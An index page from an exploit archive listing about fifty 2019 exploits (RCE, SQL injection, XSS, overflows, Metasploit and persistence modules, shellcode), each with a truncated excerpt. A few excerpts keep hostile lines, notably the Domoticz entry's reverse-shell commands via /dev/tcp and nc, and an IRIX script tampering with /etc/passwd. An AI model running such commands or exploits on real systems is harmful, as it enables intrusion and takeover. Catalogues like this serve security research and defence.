ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution Exploit
Exploit for multiple platform in category web applications https://twitter.com/gscamelo Vendor Homepage: https://smartbear.com/product/ready-api Software Link: https://smartbear.com/product/ready-api/overview/ Github: https://github.com/gscamelo/CVE-2018-20580 Version: 2.5.0 and 2.6.0 Tested on:...
LG Supersign EZ CMS - Remote Code Execution Exploit
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone to remote code execution due to...
iOS 12.1.3 - cfprefsd Memory Corruption Exploit
// c 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes // Intended only for educational and defensive purposes only. // Use at your own risk. // iOS 12.1.3 - cfprefsd Memory Corruption Exploit include import include include include include include define AGENT 1 define...
PHPads 2.0 - (click.php3?bannerID) SQL Injection Vulnerability
Exploit for php platform in category web applications + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...
microASP (Portal+) CMS - (pagina.phtml?explode_tree) SQL Injection Vulnerability
Exploit for asp platform in category web applications + Sql Injection on microASP Portal+ CMS + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: email protected + Tested on: Windows 7 and Gnu/Linux + Dork:...
Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve/bin/sh Shellcode 59 bytes Author: Xavi Beltran Date: 05/05/2019 Contact: email protected Purpose: spawn /bin/sh shell Tested On: Ubuntu 3.5.0-17-generic Arch: x86 Size: 59 bytes sh.nasm global start section .text start: xor eax, eax pu...
Linux/x86 - shred file Shellcode (72 bytes)
Exploit Title: Linux/x86 shred file 72 bytes Google Dork: None Exploit Author: strider Vendor Homepage: None Software Link: None Tested on: Debian 9 Stretch i386/ Kali Linux i386 CVE : None Shellcode Length: 72 ------------------------------Description--------------------------------- This...
Wordpress Social Warfare Plugin 3.5.3 - Remote Code Execution Exploit
Title: RCE in Social Warfare Plugin Wordpress =3.5.2 Researcher: Luka Sikic Exploit Author: hash3liZer Download Link: https://wordpress.org/plugins/social-warfare/ Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM Github...
Blue Angel Software Suite - Command Execution Exploit
Exploit Title: Blue Angel Software Suite - Authenticated Command Execution Exploit Author: Paolo Serracino Vendor Homepage: http://www.5vtechnologies.com Software Link: N/A Version: All Tested on: Embedded Linux OS CVE : N/A Description: Blue Angel Software Suite, an application that runs on...
MailCarrier 2.51 HELP Remote Buffer Overflow Exploit
!/usr/bin/python Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "HELP" commandSMTP Exploit Author: Vinaykumar Yennam and Dheepshika Raghunathan Vendor Homepage: https://www.tabslab.com/ Version: 2.51 Software Link: N.A Tested on: Windows XP Prof SP3 ENG x86 CVE: TBC from Mitre Create...
Barco / AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Exploit Author: Jacob Baines Tested on: Crestron AM-100 1.6.0.2 CVE : CVE-2019-3929 PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k...
Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Exploit Title: Linux/x86 - Reverse Shell Shellcode 91 Bytes + Python Wrapper Exploit Author: Dave Sully Vendor Homepage: Software Link: NA Version: NA Tested on: Ubuntu 16.04 CVE : NA This is the raw assembly ; Filename: reverseshell.nasm ; Author: Dave Sully ; Website: http://suls.co.uk ; Purpos...
Zotonic < 0.47.0 mod_admin - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Zotonic prompt‘XSS’ Affected source code file zotonicmodadmin: - zotonicmodadminidentity\priv\templates\adminsortheader.tpl - zotonicmodadminidentity\priv\templates\adminusers.tpl References...
SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service Exploit
Vendor: Solarwinds Site Vendor: https://www.dameware.com/ Product: Dameware Mini Remote Control Version: 10.0 x64 Platform: Windows Tested on: Windows 7 SP1 x64 Description: The DWRCC executable file is affected by a buffer overflow vulnerability. The buffer size passed in on the machine name...
Instagram Auto Follow - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?srank=4 Tested on: Linux...
phpBB 3.2.5 Denial Of Service Vulnerability
Vulnerability information ========================= Title: phpBB Native Fulltext Search denial of service CVE ID: CVE-2019-9826 CVSSv3 score: 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H Vulnerability description ========================= Improper input validation in the Native Fulltext Search compone...
Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes)
Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware 185 bytes Exploit Author: strider Vendor Homepage: None Software Link: None Tested on: Debian 9 Stretch i386/ Kali Linux i386 CVE : None Shellcode Length: 185...
Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit
Microsoft Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currentl...
Ruby On Rails DoubleTap Development Mode secret_key_base Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in Ruby on Rails. In development mode, a Rails application would use its name as the secretkeybase, and can be easily extracted by visiting an invalid resource for a path. As a result, this allows a remote user to create and deliver a signed...
Moodle 3.6.3 - Install Plugin Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...
SpotAuditor 5.2.6 - Name Denial of Service Exploit
Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows 10 Single Language x64 / 7 x64 Service...
Netgear DGN2200 / DGND3700 - Admin Password Disclosure Vulnerability
Exploit for hardware platform in category web applications /bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications IWR 3000N - CSRF on authenticated administrator Exploit! Click the button to get the login and password. function exploit $.get "http://localhost:80/v1/system/user" .done data = alert data ; .failfunction err, status alert status ; ;...
HumHub 1.3.12 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url :...
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit
Exploit for windows platform in category web applications !/usr/bin/python Exploit Title: Oracle Weblogic Exploit CVE-2019-2725 Date: 30/04/2019 Exploit Author: Avinash Kumar Thapa Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html Software Link:...
Spring Cloud Config 2.1.x - Path Traversal Exploit
Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits a...
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery Vulnerabilities
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery All Actions/Methods Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow Exploit
Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service Pack 2 CVE : N/A Generate Shellco...
DeviceViewer 3.12.0.1 - user SEH Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP P...
Intelbras IWR 3000N - Denial of Service (Remote Reboot) Vulnerability
Exploit for hardware platform in category web applications /bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a...
Freefloat FTP Server 1.0 - SIZE Remote Buffer Overflow Exploit
Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service Pack 2 CVE : N/A Generate Shellco...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget) Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Hyvikk Fleet Manager - Shell Upload Vulnerability
Exploit for php platform in category web applications ======================================================================================== | Fleet Manager hyvikk Shell Upload | Title : Fleet Manager by hyvikk All versions | Author : saxgy1331 - Kaieteur-Falls-1331 | Vendor Homepage:...
Yum Package Manager Persistence Exploit
This Metasploit module will run a payload when the package manager is used. No handler is run automatically so you must configure an appropriate exploit/multi/handler to connect. Module modifies a yum plugin to launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/ will show what...
Apache Archiva 2.2.3 Cross Site Scripting / File Write / Delete Vulnerabilities
Exploit for multiple platform in category web applications CVE-2019-0213: Apache Archiva Stored XSS Severity: Low Vendor: The Apache Software Foundation Versions Affected: Apache Archiva 2.0.0 - 2.2.3 The unsupported versions 1.x are also affected. It may be possible to store malicious XSS code...
AIS Logistics ESEL-Server SQL Injection / Code Execution Exploit
This Metasploit module will execute an arbitrary payload on an "ESEL" server used by the AIS logistic software. The server typically listens on port 5099 without TLS. There could also be a server listening on 5100 with TLS, but port 5099 is usually open. The login process is vulnerable to...
APT Package Manager Persistence Exploit
This Metasploit module creates a pre-invoke hook for APT in apt.conf.d. The hook name syntax is numeric followed by text. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'APT Package Manager...
Sierra Wireless AirLink ES450 ACEManager template_load.cgi Information Disclosure Exploit
An exploitable information disclosure vulnerability exists in the ACEManager templateload.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information leak, resulting in the disclosure of internal paths and files. An attacker can make an...
Pimcore < 5.71 Unserialize Remote Code Execution Exploit
This Metasploit module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method makes it possible to...
Agent Tesla Botnet Information Disclosure Vulnerability
Agent Tesla Botnet suffers from an information leakage vulnerability. Exploit Title: Agent Tesla Botnet - Information Disclosure Vulnerability Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10,...
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Exploit
An exploitable Information Disclosure vulnerability exists in the ACEManager EmbeddedAceGetTask.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but...
Joomla JiFile 2.3.1 Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download Exploit Author: Mr Winst0n Author E-mail: email protected Vendor Homepage: http://www.isapp.it Software Link :...
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Exploit
An exploitable information disclosure vulnerability exists in the ACEManager functionality of Sierra Wireless AirLink ES450 FW 4.9.3. An HTTP request can result in disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this...
Linux Missing Lockdown Exploit
Linux suffers from a missing locking between ELF coredump code and userfaultfd VMA modification. Linux: missing locking between ELF coredump code and userfaultfd VMA modification Related CVE Numbers: CVE-2019-11599. elfcoredump has a comment back from something like 2.5.43-C3 that says: / We no...
Sierra Wireless AirLink ES450 ACEManager iplogging.cgi Command Injection Exploit
An exploitable command injection vulnerability exists in the ACEManager iplogging.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can inject arbitrary commands, resulting in arbitrary command execution. An attacker can send an authenticated HTTP reque...
SGI IRIX <= 6.4.x Run-Time Linker Arbitrary File Creation Exploit
SGI IRIX versions 6.4.x and below run-time linker rld arbitrary file creation exploit. !/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t 0day.today 2019-04-30...
SGI IRIX <= 6.5.5 syssgi() Onyx kernel memory disclosure Exploit
Exploit for irix platform in category local exploits / SGI IRIX include include include include include define bufsize 4294967295 int mainint argc,char argv int fd; ssizet out; char outputbuffer; ifargc \n"; exit1; printf" IRIX 6.5.5 syssgi Onyx IP19/IP21/IP25 kernel memory information leak\n";...
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi Permission Assignment Exploit
An exploitable Permission Assignment vulnerability exists in the ACEManager EmbeddedAceSetTask.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause arbitrary setting writes, resulting in unverified changes to any system setting. An attacker...